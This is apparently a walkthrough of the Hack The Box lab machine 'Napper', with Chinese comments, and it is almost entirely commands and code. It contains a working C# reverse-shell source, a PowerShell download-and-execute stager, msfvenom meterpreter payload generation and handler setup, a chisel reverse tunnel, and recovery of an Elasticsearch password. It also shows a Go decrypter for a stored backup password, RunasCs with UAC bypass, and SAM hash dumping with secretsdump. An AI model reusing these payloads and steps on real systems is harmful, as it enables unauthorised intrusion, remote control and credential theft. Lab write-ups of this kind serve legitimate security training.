┌──(kali㉿kali)-[~/Desktop/htb]└─$ sudo nmap -sC -sV -Pn 10.10.11.240 Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-13 10:03 ESTNmap scan report for app.napper.htb (10.10.11.240)Host is up (0.17s latency).Not shown: 998 filtered tcp ports (no-response)PORT    STATE SERVICE  VERSION80/tcp  open  http     Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Did not follow redirect to https://app.napper.htb443/tcp open  ssl/http Microsoft IIS httpd 10.0|_http-server-header: Microsoft-IIS/10.0|_http-title: Research Blog | Home |_ssl-date: 2023-11-13T15:04:48+00:00; -4s from scanner time.| tls-alpn: |_  http/1.1| ssl-cert: Subject: commonName=app.napper.htb/organizationName=MLopsHub/stateOrProvinceName=California/countryName=US| Subject Alternative Name: DNS:app.napper.htb| Not valid before: 2023-06-07T14:58:55|_Not valid after:  2033-06-04T14:58:55|_http-generator: Hugo 0.112.3| http-methods: |_  Potentially risky methods: TRACEService Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:|_clock-skew: -4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 101.68 seconds

ffuf -w ~/wordlists/subdomains-top1million-5000.txt -u "https://napper.htb/" -H 'Host: FUZZ.napper.htb'这里也可以 -fs 5602 过滤一下其它size
或者wfuzz -c -w ~/wordlists/subdomains-top1million-5000.txt -u "https://napper.htb/" -H "Host: FUZZ.napper.htb"

using System;using System.Text;using System.IO;using System.Diagnostics;using System.ComponentModel;using System.Linq;using System.Net;using System.Net.Sockets;

namespace payload{public class Run{static StreamWriter streamWriter;

static void Main(string[] args){Console.WriteLine("Main");}
public Run(){using(TcpClient client = new TcpClient("IP", 4444)){using(Stream stream = client.GetStream()){using(StreamReader rdr = new StreamReader(stream)){streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();p.StartInfo.FileName = "powershell.exe";p.StartInfo.CreateNoWindow = true;p.StartInfo.UseShellExecute = false;p.StartInfo.RedirectStandardOutput = true;p.StartInfo.RedirectStandardInput = true;p.StartInfo.RedirectStandardError = true;p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);p.Start();p.BeginOutputReadLine();
while(true){strInput.Append(rdr.ReadLine());//strInput.Append("n");p.StandardInput.WriteLine(strInput);strInput.Remove(0, strInput.Length);}}}}}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine){StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data)){try{strOutput.Append(outLine.Data);streamWriter.WriteLine(strOutput);streamWriter.Flush();}catch (Exception err) { }}}
}}

using System;using System.Collections.Generic;using System.Linq;using System.Text;using System.Threading.Tasks;
namespace Shell{    public class Run    {        static void Main() {            System.Diagnostics.Process.Start("powershell.exe", "-nop -w hidden -c iex(iwr -useb 10.10.16.7).tostring()");        }
        static int Exec() {            Main();            return 0;        }        int a = Exec();    }}

mcs -out:payload.exe exp.csbase64 -w0 payload.exe
#base完再打个url编码传参即可这里有坑点，Host: napper.htb才行

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.85 LPORT=443 -f exe -o shell.exe
wget 10.10.14.85:8000/shell.exe -O shell.exestart-process shell.exe
use exploit/multi/handlerset PAYLOAD windows/x64/meterpreter/reverse_httpsset LHOST 10.10.14.85set LPORT 443set ExitOnSession falseexploit -j   #"-j"选项表示以后台（background）模式执行漏洞利用。
sessions -i 1

C:Program Fileselasticsearch-8.8.0dataindicesn5Gtg7mtSVOUFiVHo9w-Nwindex>type _jt.cfs|findstr pass
#elastic:oKHzjZw0EGcRxT2cux5K

C:Tempwwwinternalcontentposts>dirdir Volume in drive C has no label. Volume Serial Number is CB08-11BF
 Directory of C:Tempwwwinternalcontentposts
06/08/2023  11:20 PM    <DIR>          .06/08/2023  11:20 PM    <DIR>          ..06/08/2023  11:18 PM             1,755 first-re-research.md06/08/2023  11:28 PM    <DIR>          internal-laps-alpha06/08/2023  11:18 PM               493 no-more-laps.md               2 File(s)          2,248 bytes               3 Dir(s)   3,399,241,728 bytes free
C:Tempwwwinternalcontentposts>type no-more-laps.mdtype no-more-laps.md---title: "**INTERNAL** Getting rid of LAPS"description: Replacing LAPS with out own custom solutiondate: 2023-07-01draft: true tags: [internal, sysadmin] ---
# Intro
We are getting rid of LAPS in favor of our own custom solution. The password for the `backup` user will be stored in the local Elastic DB.
IT will deploy the decryption client to the admin desktops once it it ready. 
We do expect the development to be ready soon. The Malware RE team will be the first test group.

cd C:\Temp\www\internal\content\posts\internal-laps-alphameterpreter > download a.exe

./chisel server -p 9999 --reverse
./chisel.exe client 10.10.14.85:9999 R:9200:127.0.0.1:9200
使用上面得到得账密登录（上面多了个I，这里应该意识到去除）elasticoKHzjZw0EGcRxT2cux5K

package main
import (  "crypto/aes"  "crypto/cipher"  "encoding/base64"  "fmt"  "log"  "math/rand"  "os"  "strconv")
func checkErr(err error) {  if err != nil {    log.Fatal(err)  }}
func genKey(seed int) (key []byte) {  rand.Seed(int64(seed))  for i := 0; i < 0x10; i++ {    val := rand.Intn(0xfe)    key = append(key, byte(val+1))  }  return}
func decrypt(seed int, enc []byte) (data []byte) {  fmt.Printf("Seed: %vn", seed)  key := genKey(seed)  fmt.Printf("Key: %vn", key)  iv := enc[:aes.BlockSize]  fmt.Printf("IV: %vn", iv)  data = enc[aes.BlockSize:]    block, err := aes.NewCipher(key)  checkErr(err)    stream := cipher.NewCFBDecrypter(block, iv)  stream.XORKeyStream(data, data)  fmt.Printf("Plaintext: %sn", data)  return}
func main() {  if len(os.Args) != 3 {    return  }  seed, err := strconv.Atoi(os.Args[1])  checkErr(err)  enc, err := base64.URLEncoding.DecodeString(os.Args[2])  checkErr(err)    decrypt(seed, enc)}

go run decrypt.go 26205686 TuZN-AWElQ9uJ3e-57xWryOvUoNx6NVMSBvKUQjCx7slQltzK6mFGSxm76lByzLOqG946T24jZ8=Seed: 26205686Key: [59 180 88 221 219 162 141 110 254 90 236 126 41 17 155 90]IV: [78 230 77 248 5 132 149 15 110 39 119 190 231 188 86 175]Plaintext: gsqDrWuUSimsCvzmyoRDkpIlKJQYTeAebGYWVIVh

PS C:windowstasks> .RunasCs.exe backup gsqDrWuUSimsCvzmyoRDkpIlKJQYTeAebGYWVIVh cmd.exe -r 10.10.14.85:6666 --bypass-uac[+] Running in session 0 with process function CreateProcessWithLogonW()[+] Using StationDesktop: Service-0x0-3aeb3$Default[+] Async process 'C:Windowssystem32cmd.exe' with pid 4860 created in background.

C:WindowsTasks>powershell -c "start-process shell.exe"

Administrator:500:aad3b435b51404eeaad3b435b51404ee:ed5cc50d93a33729acd6df740eecd86c:::backup:1003:aad3b435b51404eeaad3b435b51404ee:214e8465060ac2bb26d30df8b9320cb0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::example:1002:aad3b435b51404eeaad3b435b51404ee:4da4a64845e9fbf07e0f7e236ca82694:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::ruben:1001:aad3b435b51404eeaad3b435b51404ee:ae5917c26194cec4fc402490c7a919a7:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:49c2f41a954679b5f3a7ef12deab11e4:::

reg save hklmsam samreg save hklmsystem system
┌──(kali㉿kali)-[~/Desktop/htb/napper]└─$ python3 /usr/local/bin/secretsdump.py -sam sam -system system LOCALImpacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0xa79b561a7776766c6d7c816b6f73e877[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:ed5cc50d93a33729acd6df740eecd86c:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:49c2f41a954679b5f3a7ef12deab11e4:::ruben:1001:aad3b435b51404eeaad3b435b51404ee:ae5917c26194cec4fc402490c7a919a7:::example:1002:aad3b435b51404eeaad3b435b51404ee:4da4a64845e9fbf07e0f7e236ca82694:::backup:1003:aad3b435b51404eeaad3b435b51404ee:30f696f359ce1f644bac9e7e22df7e3f:::[*] Cleaning up...